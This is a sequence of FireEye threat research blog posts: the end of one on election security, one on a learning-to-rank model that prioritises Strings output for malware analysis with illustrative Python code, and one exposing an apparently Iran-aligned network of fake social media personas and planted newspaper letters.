Of the activity described here, FireEye has observed a full spectrum of campaigns by Russian-nexus actors, from carrying out intrusions into organizations and stealing data, to leaking that data through online personas and fronts, to targeting election infrastructure. From limited observations, China has for the most part focused solely on cyber espionage operations, as in the case of the activity FireEye reported on targeting the 2018 Cambodian election. FireEye has also witnessed limited evidence of activity from hacktivists and criminal entities, with various motivations, targeting parts of the election ecosystem.

Conclusion

While there is increasing global awareness of threats to elections, election administrators and others continue to face challenges in ensuring the integrity of the vote. To properly counter threats to elections, individuals and organizations involved in the electoral process should:

Learn the Playbook of the Adversary: Proactive organizations can learn from the activity of threat actors uncovered in other elections and implement security controls that adapt to new tools and TTPs. Political campaigns and others should also educate staff and contractors on common spear-phishing tactics used by some of the primary APT groups.
Incorporate Threat Intelligence for Context: Operationally, security organizations can utilize threat intelligence to better differentiate and triage the most important alerts from untargeted commodity malware activity.
Anticipate External Threats: Beyond the internal networks of county governments and political campaigns, election administrators and risk management professionals involved in elections should prepare plans for dealing with leaked and compromised data, understanding how threat actors may utilize this for disinformation campaigns.

I will be speaking about cyber threats and elections during FireEye Virtual Summit, so register today to learn more.

Learning to Rank Strings Output for Speedier Malware Analysis

Threat Research

Philip Tully

29 May 2019 at 14:30

Reverse engineers, forensic investigators, and incident responders have an arsenal of tools at their disposal to dissect malicious software binaries. When performing malware analysis, they successively apply these tools in order to gradually gather clues about a binary’s function, design detection methods, and ascertain how to contain its damage. One of the most useful initial steps is to inspect its printable characters via the Strings program. A binary will often contain strings if it performs operations like printing an error message, connecting to a URL, creating a registry key, or copying a file to a specific location – each of which provides crucial hints that can help drive future analysis.

Manually filtering out these relevant strings can be time consuming and error prone, especially considering that:

Relevant strings occur disproportionately less often than irrelevant strings.
Larger binaries can output upwards of tens of thousands of individual strings.
The definition of “relevant” can vary significantly across individual human analysts.

Investigators would never want to miss an important clue that could have reduced their time spent performing the malware analysis, or even worse, led them to draw incomplete or incorrect conclusions. In this blog post, we will demonstrate how the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams recently collaborated to streamline this analyst pain point using machine learning.

Highlights

Running the Strings program on a piece of malware inevitably produces noisy strings mixed in with important ones, which can only be uncovered after sifting and scrolling through the entirety of its messy output. FireEye’s new machine learning model that automatically ranks strings based on their relevance for malware analysis speeds up this process at scale.
Knowing which individual strings are relevant often requires highly experienced analysts. Quality, security-relevant labeled training data can be time consuming and expensive to obtain, but weak supervision that leverages the domain expertise of reverse engineers helps accelerate this bottleneck.
Our proposed learning-to-rank model can efficiently prioritize Strings outputs from individual malware samples. On a dataset of relevant strings from over 7 years of malware reports authored by FireEye reverse engineers, it also performs well based on criteria commonly used to evaluate recommendation and search engines.

Background

Each string returned by the Strings program is represented by sequences of 3 characters or more ending with a null terminator, independent of any surrounding context and file formatting. These loose criteria mean that Strings may identify sequences of characters as strings when they are not human-interpretable. For example, if consecutive bytes 0x31, 0x33, 0x33, 0x37, 0x00 appear within a binary, Strings will interpret this as “1337.” However, those ASCII characters may not actually represent that string per se; they could instead represent a memory address, CPU instructions, or even data utilized by the program. Strings leaves it up to the analyst to filter out such irrelevant strings that appear within its output. For instance, only a handful of the strings listed in Figure 1 that originate from an example malicious binary are relevant from a malware analyst’s point of view.
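As a rough illustration of the extraction rule described above, the following minimal Python sketch scans a byte buffer for runs of three or more printable ASCII characters followed by a null byte. It is not the Strings program itself: the function name extract_ascii_strings, the printable range used, and the sample bytes are assumptions made for illustration, and it ignores Unicode strings entirely.

```python
import re

def extract_ascii_strings(data: bytes, min_len: int = 3):
    """Return printable-ASCII runs of at least min_len bytes that end in a null byte.

    Simplified approximation of the rule described in the text, not the
    actual Strings implementation (hypothetical helper for illustration).
    """
    # 0x20-0x7e covers space through tilde, i.e. printable ASCII.
    pattern = re.compile(rb"([\x20-\x7e]{%d,})\x00" % min_len)
    return [m.group(1).decode("ascii") for m in pattern.finditer(data)]

# Made-up sample buffer: the bytes 0x31 0x33 0x33 0x37 0x00 from the text,
# surrounded by non-printable bytes, a URL, and a run that is too short.
blob = b"\x90\x90" + bytes([0x31, 0x33, 0x33, 0x37, 0x00]) + b"\xff\xfehttp://example.test/a\x00ab\x00"
print(extract_ascii_strings(blob))
```

Note that the extractor has no way of knowing whether “1337” was meant as text or is just a coincidental byte pattern, which is exactly why the output needs ranking.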

Figure 1: An example Strings output containing 44 strings for a toy sample with a SHA-256 value of eb84360ca4e33b8bb60df47ab5ce962501ef3420bc7aab90655fd507d2ffcedd.

Ranking strings in terms of descending relevance would make an analyst’s life much easier. They would then only need to focus their attention on the most relevant strings located towards the top of the list, and simply disregard everything below. However, solving the task of automatically ranking strings is not trivial. The space of relevant strings is unstructured and vast, and devising finely tuned rules to robustly account for all the possible variations among them would be a tall order.

Learning to Rank Strings Output

This task can instead be formulated in a machine learning (ML) framework called learning to rank (LTR), which has been historically applied to problems like information retrieval, machine translation, web search, and collaborative filtering. One way to tackle LTR problems is by using Gradient Boosted Decision Trees (GBDTs). GBDTs successively learn individual decision trees that reduce the loss using a gradient descent procedure, and ultimately use a weighted sum of every tree’s prediction as an ensemble. GBDTs with an LTR objective function can learn class probabilities to compute each string’s expected relevance, which can then be used to rank a given Strings output. We provide a high-level overview of how this works in Figure 2.

In the initial train() step of Figure 2, over 25 thousand binaries are run through the Strings program to generate training data consisting of over 18 million total strings. Each training sample then corresponds to the concatenated list of ASCII and Unicode strings output by the Strings program on that input file. To train the model, these raw strings are transformed into numerical vectors containing natural language processing features like Shannon entropy and character co-occurrence frequencies, together with domain-specific signals like the presence of indicators of compromise (e.g. file paths, IP addresses, URLs, etc.), format strings, imports, and other relevant landmarks.
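To make the featurization step more concrete, here is a minimal Python sketch that turns a single string into a small numerical vector. It covers only a few of the signals mentioned above (length, Shannon entropy, and simple URL, IPv4, and format-string checks). The function names, the regular expressions, and the feature order are illustrative assumptions and are not the features used in the actual model.

```python
import math
import re
from collections import Counter

# Deliberately simple, hypothetical patterns; real indicator matching is stricter.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
FORMAT_RE = re.compile(r"%[sdxu]")

def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of the string's character distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = Counter(s)
    # sum over characters of p * log2(1/p), with p = count / n
    return sum((c / n) * math.log2(n / c) for c in counts.values())

def featurize(s: str) -> list:
    """Map a raw string to [length, entropy, has_url, has_ipv4, has_format_spec]."""
    return [
        float(len(s)),
        shannon_entropy(s),
        float(bool(URL_RE.search(s))),
        float(bool(IPV4_RE.search(s))),
        float(bool(FORMAT_RE.search(s))),
    ]

print(featurize("http://10.0.0.1/x"))
print(featurize("Error %d: %s"))
```

A repeated-character string such as "aaaa" has zero entropy, while a string of four distinct characters has two bits per character, so entropy gives the model a cheap signal for separating padding or noise from structured text.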

Figure 2: The ML-based LTR framework ranks strings based on their relevance for malware analysis. This figure illustrates different steps of the machine learning modeling process: the initial train() step is denoted by solid arrows and boxes, and the subsequent predict() and sort() steps are denoted by dotted arrows and boxes.

Each transformed string’s feature vector is associated with a non-negative integer label that represents its relevance for malware analysis. Labels range from 0 to 7, with higher numbers indicating increased relevance. To generate these labels, we leverage the subject matter knowledge of FLARE analysts to apply heuristics and impose high-level constraints on the resulting label distributions. While this weak supervision approach may generate noise and spurious errors compared to an ideal case where every string is manually labeled, it also provides an inexpensive and model-agnostic way to integrate domain expertise directly into our GBDT model.

Next during the predict() step of Figure 2, we use the trained GBDT model to predict ranks for the strings belonging to an input file that was not originally part of the training data, and in this example query we use the Strings output shown in Figure 1. The model predicts ranks for each string in the query as floating-point numbers that represent expected relevance scores, and in the final sort() step of Figure 2, strings are sorted in descending order by these scores. Figure 3 illustrates how this resulting prediction achieves the desired goal of ranking strings according to their relevance for malware analysis.
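The predict() and sort() steps can be sketched in a few lines of Python. In the sketch below, toy_score is a hypothetical hand-written stand-in for the trained GBDT model, and its rules and weights are invented purely so the example runs. Only the overall shape (score every string, then sort in descending order of score) reflects the process described above.

```python
from typing import Callable, List, Tuple

def rank_strings(strings: List[str],
                 score_fn: Callable[[str], float]) -> List[Tuple[str, float]]:
    """Score each string (predict) and order by descending score (sort)."""
    scored = [(s, score_fn(s)) for s in strings]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)

def toy_score(s: str) -> float:
    """Hypothetical scorer standing in for the trained model; not the real model."""
    score = 0.0
    if "://" in s:   # looks like a URL
        score += 3.0
    if "\\" in s:    # looks like a registry or file path
        score += 2.0
    return score

query = [
    "GetProcAddress",
    "http://example.test/gate.php",
    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
]
for string, score in rank_strings(query, toy_score):
    print(f"{score:4.1f}  {string}")
```

Passing the scorer in as a function keeps the ranking step independent of the model, so a real trained model's prediction function could be substituted without changing the sorting logic.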

Figure 3: The resulting ranking on the strings depicted in both Figure 1 and in the truncated query of Figure 2. Contrast the relative ordering of the strings shown here to those otherwise identical lists.

The predicted and sorted string rankings in Figure 3 show network-based indicators on top of the list, followed by registry paths and entries. These reveal the potential C2 server and malicious behavior on the host. The subsequent output consisting of user-related information is more likely to be benign, but still worthy of investigation. Rounding out the list are common strings like Windows API functions and PE artifacts that tend to raise no red flags for the malware analyst.

Quantitative Evaluation

While it seems like the model qualitatively ranks the above strings as expected, we would like some quantitative way to assess the model’s performance more holistically. What evaluation criteria can we use to convince ourselves that the model generalizes beyond the coverage of our weak supervision sources, and to compare models that are trained with different parameters?

We turn to the recommender systems literature, which uses the Normalized Discounted Cumulative Gain (NDCG) score to evaluate ranking of items (i.e. individual strings) in a collection (i.e. a Strings output). NDCG sounds complicated, but let’s boil it down one letter at a time:

“G” is for gain, which corresponds to the magnitude of each string’s relevance.
“C” is for cumulative, which refers to the cumulative gain or summed total of every string’s relevance.
“D” is for discounted, which divides each string’s predicted relevance by a monotonically increasing function like the logarithm of its ranked position, reflecting the goal of having the most relevant strings ranked towards the top of our predictions.
“N” is for normalized, which means dividing DCG scores by ideal DCG scores calculated for a ground truth holdout dataset, which we obtain from FLARE-identified relevant strings contained within historical malware reports. Normalization makes it possible to compare scores across samples since the number of strings within different Strings outputs can vary widely.

Figure 4: Kernel Density Estimate of NDCG@100 scores for Strings outputs from the holdout dataset. Scores are calculated for the original ordering after simply running the Strings program on each binary (gray) versus the predicted ordering from the trained GBDT model (red).

In practice, we take the first k strings indexed by their ranks within a single Strings output, where the k parameter is chosen based on how many strings a malware analyst will attend to or deem relevant on average. For our purposes we set k = 100 based on the approximate average number of relevant strings per Strings output. NDCG@k scores are bounded between 0 and 1, with scores closer to 1 indicating better prediction quality in which more relevant strings surface towards the top. This measurement allows us to evaluate the predictions from a given model versus those generated by other models and ranked with different algorithms.
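The NDCG@k computation can be sketched as follows. This is a minimal illustration that assumes a linear gain (the relevance label itself) and a log2(position + 1) discount, which is one common formulation. The post does not state which exact variant was used, and the function names here are illustrative.

```python
import math
from typing import Sequence

def dcg_at_k(relevances: Sequence[float], k: int) -> float:
    """Discounted cumulative gain over the first k items, in the order given."""
    return sum(rel / math.log2(pos + 1)
               for pos, rel in enumerate(relevances[:k], start=1))

def ndcg_at_k(relevances_in_predicted_order: Sequence[float], k: int) -> float:
    """DCG@k of the predicted ordering divided by DCG@k of the ideal ordering."""
    ideal = sorted(relevances_in_predicted_order, reverse=True)
    ideal_dcg = dcg_at_k(ideal, k)
    if ideal_dcg == 0:
        return 0.0  # no relevant items at all; defined as 0 here by convention
    return dcg_at_k(relevances_in_predicted_order, k) / ideal_dcg

# Ground-truth labels (0 to 7) listed in the order two rankings placed the strings.
good_ranking = [7, 3, 0, 0]   # relevant strings surfaced first
poor_ranking = [0, 0, 3, 7]   # relevant strings buried at the bottom
print(ndcg_at_k(good_ranking, k=4))
print(ndcg_at_k(poor_ranking, k=4))
```

A ranking that already matches the ideal ordering scores exactly 1, and pushing relevant strings further down the list lowers the score, which matches the intuition behind the “discounted” term.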

To quantitatively assess model performance, we run the strings from each sample that has a ground truth FLARE report through the predict() step of Figure 2, and compare their predicted ranks with a baseline of the original ranking of strings output by Strings. The divergence in distributions of NDCG@100 scores between these two approaches demonstrates that the trained GBDT model learns a useful structure that generalizes well to the independent holdout set (Figure 4).

Conclusion

In this blog post, we introduced an ML model that learns to rank strings based on their relevance for malware analysis. Our results illustrate that it can rank Strings output based both on qualitative inspection (Figure 3) and quantitative evaluation of NDCG@k (Figure 4). Since Strings is so commonly applied during malware analysis at FireEye and elsewhere, this model could significantly reduce the overall time required to investigate suspected malicious binaries at scale. We plan on continuing to improve its NDCG@k scores by training it with more high fidelity labeled data, incorporating more sophisticated modeling and featurization techniques, and soliciting further analyst feedback from field testing.

It’s well known that malware authors go to great lengths to conceal useful strings from analysts, and a potential blind spot to consider for this model is that the utility of Strings itself can be thwarted by obfuscation. However, open source tools like the FireEye Labs Obfuscated Strings Solver (FLOSS) can be used as an in-line replacement for Strings. FLOSS automatically extracts printable strings just as Strings does, but additionally reveals obfuscated strings that have been encoded, packed, or manually constructed on the stack. The model can be readily trained on FLOSS outputs to rank even obfuscated strings. Furthermore, since it can be applied to arbitrary lists of strings, the model could also be used to rank strings extracted from live memory dumps and sandbox runs.

This work represents a collaboration between the FDS and FLARE teams, which together build predictive models to help find evil and improve outcomes for FireEye’s customers and products. If you are interested in this mission, please consider joining the team by applying to one of our job openings.

Network of Social Media Accounts Impersonates U.S. Political Candidates, Leverages U.S. and Israeli Media in Support of Iranian Interests

Threat Research

Alice Revelli

28 May 2019 at 19:00

In August 2018, FireEye Threat Intelligence released a report exposing what we assessed to be an Iranian influence operation leveraging networks of inauthentic news sites and social media accounts aimed at audiences around the world. We identified inauthentic social media accounts posing as everyday Americans that were used to promote content from inauthentic news sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front. We also noted a then-recent shift in branding for some accounts that had previously self-affiliated with LFP; in July 2018, the accounts dropped their LFP branding and adopted personas aligned with progressive political movements in the U.S. Since then, we have continued to investigate and report on the operation to our intelligence customers, detailing the activity of dozens of additional sites and hundreds of additional social media accounts.

Recently, we investigated a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation and that we assess with low confidence was organized in support of Iranian political interests. In addition to utilizing fake American personas that espoused both progressive and conservative political stances, some accounts impersonated real American individuals, including a handful of Republican political candidates that ran for House of Representatives seats in 2018. Personas in this network have also had material published in U.S. and Israeli media outlets, attempted to lobby journalists to cover specific topics, and appear to have orchestrated audio and video interviews with U.S. and UK-based individuals on political issues. While we have not at this time tied these accounts to the broader influence operation we identified last year, they promoted material in line with Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin. Most of the accounts in the network appear to have been suspended on or around the evening of 9 May, 2019. Appendix 1 provides a sample of accounts in the network.

The Network

The accounts, most of which were created between April 2018 and March 2019, used profile pictures appropriated from various online sources, including, but not limited to, photographs of individuals on social media with the same first names as the personas. As with some of the accounts that we identified to be of Iranian origin last August, some of these new accounts self-described as activists, correspondents, or “free journalist[s]” in their user descriptions. Some accounts posing as journalists claimed to belong to specific news organizations, although we have been unable to identify individuals belonging to those news organizations with those names.

Narratives promoted by these and other accounts in the network included anti-Saudi, anti-Israeli, and pro-Palestinian themes. Accounts expressed support for the Joint Comprehensive Plan of Action (JCPOA), commonly known as the Iran nuclear deal; opposition to the Trump administration’s designation of Iran’s Islamic Revolutionary Guard Corps (IRGC) as a Foreign Terrorist Organization; antipathy toward the Ministerial to Promote a Future of Peace and Security in the Middle East (a U.S.-led conference that focused on Iranian influence in the Middle East more commonly known as the February 2019 Warsaw Summit); and condemnation of U.S. President Trump’s veto of a resolution passed by Congress to end U.S. involvement in the Yemen conflict.

Figure 1: Sample tweets on the Trump administration’s designation of Iran’s IRGC as a Foreign Terrorist Organization

Interestingly, some accounts in the network also posted a small amount of messaging seemingly contradictory to their otherwise pro-Iran stances. For example, while one account’s tweets were almost entirely in line with Iranian political interests, including a tweet claiming that “iran has shown us that his nuclear program is peaceful [sic],” the account also posted a series of tweets directed at U.S. President Trump on Sept. 25, 2018, the same day that he gave a speech to the United Nations in which he excoriated the Iranian Government. The account called on Trump to attack Iran, using the hashtags #attack_Iran, #go_to_hell_Rouhani, #stop_sanctions, #UnitedNations, and #trump_speech; other accounts in the network, which likewise predominantly held pro-Iran stances, echoed these sentiments, using the same or similar hashtags. It is possible that these accounts were seeking to build an audience with views antipathetic to Iran that could then later be targeted with pro-Iranian messaging.

Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature. Subsequently, in 2017, @AlexRyanNY claimed to be “an Iranian who supported Hillary” in a tweet directed at a Democratic political strategist. This account, using the display name “Alex Ryan” and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex. We note that it is possible that the account was compromised from another individual or that it was merely repurposed by the same actor. Additionally, while most of the accounts in the network had their interface languages set to English, we observed that one account had its interface language set to Persian.

Impersonation of U.S. Political Candidates

Some Twitter accounts in the network impersonated Republican political candidates that ran for House of Representatives seats in the 2018 U.S. congressional midterms. These accounts appropriated the candidates’ photographs and, in some cases, plagiarized tweets from the real individuals’ accounts. Aside from impersonating real U.S. political candidates, the behavior and activity of these accounts resembled that of the others in the network.

For example, the account @livengood_marla impersonated Marla Livengood, a 2018 candidate for California’s 9th Congressional District, using a photograph of Livengood and a campaign banner for its profile and background pictures. The account began tweeting on Sept. 24, 2018, with its first tweet plagiarizing one from Livengood’s official account earlier that month:

Figure 2: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 1, 2018 (right)

The @livengood_marla account plagiarized a number of other tweets from Livengood’s official account, including some that referenced Livengood’s official account username:

Figure 3: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 3, 2018 (right)

The @livengood_marla account also tweeted various news snippets on both political and apolitical subjects, such as the confirmation of Brett Kavanaugh to the U.S. Supreme Court and the wedding of the UK’s Princess Eugenie and Jack Brooksbank, prior to segueing into promoting material more closely aligned with Iranian interests. For example, the account, along with others in the network, commemorated the United Nations’ International Day of the Girl Child with a photograph of emaciated children in Yemen, as well as narratives pertaining to the killing of Saudi journalist Jamal Khashoggi and Saudi Shiite child Zakaria al-Jaber, intended to portray Saudi Arabia in a negative light.

In another example, the account @ButlerJineea impersonated Jineea Butler, a 2018 candidate for New York’s 13th Congressional District, using a photograph of Butler for its profile picture and incorporating her campaign slogans into its background picture, as well as claiming in its Twitter bio to be a “US House candidate, NY-13” and linking to Butler’s website, jineeabutlerforcongress.com.

Figure 4: Suspect account @ButlerJineea (left); apparent legitimate, currently inactive account @Jineea4congress (right)

These and other accounts in the network plagiarized tweets from additional sources beyond the individuals they impersonated, including other U.S. politicians, about both political and apolitical topics.

Influence Activity Leveraged U.S. and Israeli Media

In addition to directly posting material on social media, we observed some personas in the network leverage legitimate print and online media outlets in the U.S. and Israel to promote Iranian interests via the submission of letters, guest columns, and blog posts that were then published. We also identified personas that we suspect were fabricated for the sole purpose of submitting such letters, but that do not appear to maintain accounts on social media. The personas claimed to be based in varying locations depending on the news outlets they were targeting for submission; for example, a persona that listed their location as Seattle, WA in a letter submitted to the Seattle Times subsequently claimed to be located in Baytown, TX in a letter submitted to The Baytown Sun. Other accounts in the network then posted links to some of these letters on social media.

The letters and columns, many of which were published in 2018 and 2019, but which date as far back as 2015, were mostly published in small, local U.S. news outlets; however, several larger outlets have also published material that we suspect was submitted by these personas (see Appendix 2). In at least two cases, the text of letters purportedly authored by different personas and published in different newspapers was identical or nearly identical, while in other instances, separate personas promoted the same narratives in letters published within several days of each other. The published material was not limited to letters; one persona, “John Turner,” maintained a blog on The Times of Israel website from January 2017 to November 2018, and wrote articles for the U.S.-based site Natural News Blogs from August 2015 to July 2018. The letters and articles primarily addressed themes or promoted stances in line with Iranian political interests, similar to the activity conducted on social media.

Figure 5: Sample letter published in Galveston County’s (Texas) The Daily News, authored by suspect persona Mathew O’Brien

We have thus far identified at least five suspicious personas that have had letters or other content published by legitimate news outlets. We surmise that additional personas exist, based on other investigatory leads.

“John Turner”: The John Turner persona has been active since at least 2015. Turner has claimed to be based, variously, in New York, NY, Seattle, WA, and Washington, DC. Turner described himself as a journalist in his Twitter profile, though he has also claimed both to work at the Seattle Times and to be a student at Villanova University, attending between 2015 and 2020. In addition to letters published in various news outlets, John Turner maintained a blog on The Times of Israel site in 2017 and 2018 and has written articles for Natural News Blogs. At least one of Turner’s letters was promoted in a tweet by another account in the network.

“Ed Sullivan”: The Ed Sullivan persona, which has on at least one occasion used the same headshot as that of John Turner, has had letters published in the Galveston County, Texas-based The Daily News, the New York Daily News, and the Los Angeles Times, including some letters identical in text to those authored by the “Jeremy Watte” persona (see below) published in the Texas-based outlet The Baytown Sun. Ed Sullivan has claimed his location to be, variously, Galveston and Newport News (Virginia).

“Mathew Obrien”: The Mathew Obrien persona, whose name has also been spelled “Matthew Obrien” and “Mathew O’Brien”, claimed in his Twitter bio to be a Newsday correspondent. The persona has had letters published in Galveston County’s The Daily News and the Athens, Texas-based Athens Daily Review; in those letters, his claimed locations were Galveston and Athens, respectively, while the persona’s Twitter account, @MathewObrien1, listed a location of New York, NY. At least one of Obrien’s letters was promoted in a tweet by another account in the network.

“Jeremy Watte”: Letters signed by the Jeremy Watte persona have been published in The Baytown Sun and the Seattle Times, where he claimed to be based in Baytown and Seattle, respectively. The texts of at least two letters signed by Jeremy Watte are identical to those of letters published in other newspapers under the name Ed Sullivan. At least one of his letters was promoted in a tweet by another account in the network.

“Isabelle Kingsly”: The Isabelle Kingsly persona claimed on her Twitter profile (@IsabelleKingsly) to be an “Iranian-American” based in Seattle, WA. Letters signed by Kingsly have appeared in The Baytown Sun and the Newport News Virginia local paper The Daily Press; in those letters, Kingsly’s location is listed as Galveston and Newport News, respectively. The @IsabelleKingsly Twitter account’s profile picture and other posted pictures were appropriated from a social media account of what appears to be a real individual with the same first name of Isabelle. At least one of Kingsly’s letters was promoted in a tweet by another account in the network.

Other Media Activity

Personas in the network also engaged in other media-related activity, including criticism and solicitation of mainstream media coverage, and conducting remote video and audio interviews with real U.S. and UK-based individuals while presenting themselves as journalists. One of those latter personas presented as working for a mainstream news outlet.

Criticism/Solicitation of Media Coverage

Accounts in the network directed tweets at mainstream media outlets, calling on them to provide coverage of topics aligned with Iranian interests or, alternatively, criticizing them for insufficient coverage of those topics. For example, we observed accounts criticizing media outlets over their lack of coverage of the killing of Shiite child Zakaria al-Jaber in Saudi Arabia, as well as Saudi Arabia’s conduct in the Yemen conflict. While such activity might have been intended to directly influence the media outlets’ reporting, the accounts may have also been aiming to reach a wider audience by tweeting at outlets with a large following that would see those replies.

Figure 6: Sample tweets by suspect accounts calling on mainstream media outlets to increase their coverage of alleged Saudi activity in the Yemen conflict

“Media” Interviews with Real U.S., UK-Based Individuals

Accounts in the network, under the guise of journalist personas, also solicited various individuals over Twitter for interviews and chats, including real journalists and politicians. The personas appear to have successfully conducted remote video and audio interviews with U.S. and UK-based individuals, including a prominent activist, a radio talk show host, and a former U.S. Government official, and subsequently posted the interviews on social media, showing only the individual being interviewed and not the interviewer. The interviewees expressed views that Iran would likely find favorable, discussing topics such as the February 2019 Warsaw summit, an attack on a military parade in the Iranian city of Ahvaz, and the killing of Jamal Khashoggi.

The provenance of these interviews appears to have been misrepresented on at least one occasion, with one persona appearing to have falsely claimed to be operating on behalf of a mainstream news outlet; a remote video interview with a US-based activist about the Jamal Khashoggi killing was posted by an account adopting the persona of a journalist from the outlet Newsday, with the Newsday logo also appearing in the video. We did not identify any Newsday interview with the activist in question on this topic. In another instance, a persona posing as a journalist directed tweets containing audio of an interview conducted with a former U.S. Government official at real media personalities, calling on them to post about the interview.

Conclusion

We are continuing to investigate this and potentially related activity that may be conducted by actors in support of Iranian interests. At this time, we are unable to provide further attribution for this activity, and we note the possibility that the activity could have been designed for alternative purposes or include some small percentage of authentic behavior. However, if it is of Iranian origin or supported by Iranian state actors, it would demonstrate that Iranian influence tactics extend well beyond the use of inauthentic news sites and fake social media personas, to also include the impersonation of real individuals on social media and the leveraging of legitimate Western news outlets to disseminate favorable messaging. If this activity is being conducted by the same or related actors as those responsible for the Liberty Front Press network of inauthentic news sites and affiliated social media accounts that we exposed in August 2018, it may also suggest that these actors remain undeterred by public exposure or by social media platforms’ shutdowns of their accounts, and that they continue to seek to influence audiences within the U.S. toward positions in line with Iranian political interests.

Appendices

Appendix 1: Sample Twitter accounts identified in this network, currently suspended.

Username	Display Name	Bio	Creation Date	Location
@MichaelA22444	Michael Anderson	Free journalist #resist	3/16/2019	DC
@sammichelsn1995	Sam Michelson	Journalist. In search of reality. 1995. Resistance.	3/14/2019
@JasonCa26738291	Jason Campbell	It’s our duty to leave our Country-to our children-better than we found it	2/20/2019
@SaraMar44752473	Sara Martin		1/24/2019
@LisaBro09759828	Lisa Brown		1/24/2019
@Jennife67352965	Jennifer Parker	I AM	1/23/2019
@SusanSc25255529	Susan Scott	Don't think too hard, just have fun with life...	1/22/2019
@LindaJa02370118	Linda Jackson	I drink lots of tea...	1/22/2019
@MarkAda05568324	Mark Adams		1/22/2019
@aliisseeeee	alliisse	Liberty	1/21/2019	New York
@morsi18	morsi		1/13/2019
@AntiReality2	Anti_Reality	Very angry mad at politicians In favor of sick minds	1/9/2019	North Carolina, USA
@JennyMick3	Jenny Mick	Unemployment Widow mother of two	1/9/2019	Pennsylvania, USA
@JaneAnton9	Jane Anton	Daughter of best parent. Do your best, just let your success shows your efforts.	1/9/2019	California, USA
@RabinAntonio	Antonio Rabin	Student at Harvard college. somehow into politics. I love gym	1/9/2019
@Angelofhuman1	Angel of human	I do into beauty and humanity	12/26/2018	California, USA
@AliciaHernan3	Alicia Hernan	Wife, mom of tow sons, student, in favor of peace.	12/26/2018	New York, USA
@ThomasRace3	Thomas Race	Bodybuilding sports and into Music and gym	12/25/2018	Michigan, USA
@EmmaWil14155495	Emma Wilkerson	Student in college studying International law	12/25/2018	Sunnyvale, CA
@Kevin24798000	Kevin	A free person from everywhere I'm somehow into politics	12/15/2018	New York, USA
@ImanRashedii	Iman Rashed	Correspondent at https://t.co/3hxSgtkuXh. 🎥📸Freelance Journalist. ➡️➡️oppose War and Brutality 💆‍♂️I was born in Beirut	12/8/2018	London
@emAnderson1996	emily anderson	In search of peace. Really into politics and justice. Love US and other countries.	10/6/2018	New York, USA
@FordNaava	naava ford		10/2/2018
@MaazRoss	maaz ross	follow back	9/30/2018
@sam86523055	ResistSam	high educated free journalist in favor of politics in search of reality Middle East issues	9/29/2018	New York, USA
@ButlerJineea	Jineea Butler	US House candidate, NY-13	9/26/2018	U.S. Congressional Candidate for NY District 13 serving Harlem, Washington Heights and Western Bronx.US
@TynioAnya	Anya Tynio		9/26/2018
@livengood_marla	Marla Livengood		9/23/2018
@Fall_Of_Amercia	Fall_of_Amercia	save the US	9/8/2018	Washington, DC
@IsabelleKingsly	Elizabeth Warren not for 2020	Single. Iranian-American. Lifestyle.And a tad of politics. @ewarren not for 2020.	9/8/2018	Seattle, WA
@MathewObrien1	Mathew Obrien	A single boy,@Newsday correspondent , interested in news Scientist🔬. Animal 🐘 and Nature lover🌲, hiker and backpacker♍ .	6/21/2018	New York, NY
@HumanBeingUSA	Human-Rights	The fight for human rights never sleeps, standing up for human rights across the world, wherever justice, freedom, fairness and truth are denied.	6/14/2018	New York, USA
@ashleyc57528342	ashley cohen	follow me to get follow back	6/14/2018	Arizona, USA
@josefsanchezzzz	josef sanchez		6/10/2018
@GuillouJan	jan guillou		5/13/2018
@saidqutb2	saidqutb		5/12/2018
@olegkashin4321	rajat sharma		5/8/2018
@Suzan_Nicolson	Suzan Nicholson	follow me to get follow back	5/8/2018	Las Vegas, NV
@caroloffoff	diana culi		5/7/2018
@hairullomirsaid	guillem balague		5/7/2018
@habibayyoub1	habib ayyoub		5/6/2018
@daphneposh	James Anderson	No Magats 🚫, 🔥 Anti War & Hate, Pro Equality, Humanity, Humor & Sensible Gun Reform	4/30/2018	New York, USA
@JohnHoward333	John H.T	Journalist. RTs Are not necessarily endorsements. All views my own. #Resist	5/12/2015	Washington, USA
@AlexRyanNY	Alex Ryan	New Yorker, @Newsday correspondent. You don't have a soul. You are a Soul. You have a body.	4/17/2011	New York, USA

Table 1: Sample Twitter accounts identified in this network

Appendix 2: Sample letters published in news outlets submitted by personas identified in this network, August 2018 to April 2019.

Date	Author	Author’s Listed Location	Newspaper	Article
Aug. 1, 2018	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Trump’s wall just a vanity project” The letter argues against the Trump administration’s proposed border wall with Mexico. The text of the letter is identical to that published in Galveston County’s The Daily News (galvnews.com) on Aug. 4, 2018, three days later. http://baytownsun.com/opinion/article_85fa9df4-9527-11e8-9aa8-1bb745e7141a.html
Aug. 4, 2018	Ed Sullivan	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Trump cares not one wit about effects of shutdown” The text of the letter is identical to that published in The Baytown Sun on Aug. 1. https://www.galvnews.com/opinion/guest_columns/article_7d5b3e9b-cbdd-5ac8-8c91-3a1eb0da3df7.html
Oct. 11, 2018	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Time to fight for it” The letter, written from the point of view of an individual aligned with the U.S. political left, calls on individuals to fight for justice. http://baytownsun.com/opinion/article_915fde6c-ccf3-11e8-a085-33dce44563d1.html
